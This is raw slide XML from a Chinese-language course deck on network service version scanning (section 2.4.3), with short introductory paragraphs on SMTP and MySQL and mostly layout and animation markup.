            <p:cNvPr id="5" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385757" y="5958799"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6386452" y="6001344"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5704620" y="1074420"/>
            <a:ext cx="6064885" cy="5004435"/>
            <a:chOff x="6386452" y="1859239"/>
            <a:chExt cx="6637574" cy="5004435"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387147" y="1962744"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6943116" y="1859239"/>
              <a:ext cx="6080910" cy="5004435"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">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indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>SMTP服务简介</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>SMTP是提供可靠且有效的电子邮件传输的协议。SMTP是建立在FTP文件传输服务上的一种邮件服务，主要用于系统之间的邮件信息传递，并提供有关来信的通知。SMTP独立于特定的传输子系统，且只需要可靠有序的数据流信道支持，SMTP的重要特性之一是其能跨越网络传输邮件，即“SMTP邮件中继”。SMTP默认使用TCP端口25。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>MySQL服务简介</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>数据库是按照数据结构来组织、存储和管理数据的仓库，是一个长期存储在计算机内的、有组织的、共享的、统一管理的数据集合。用户可以对数据库中的数据进行新增、查询、更新、删除等操作。MySQL是一种比较常用的数据库管理系统。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387842" y="1998939"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>06</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6386452" y="4489409"/>
              <a:ext cx="485083" cy="429895"/>
            </a:xfrm>
            <a:prstGeom prst="round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zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6387147" y="4509094"/>
              <a:ext cx="555274" cy="387350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
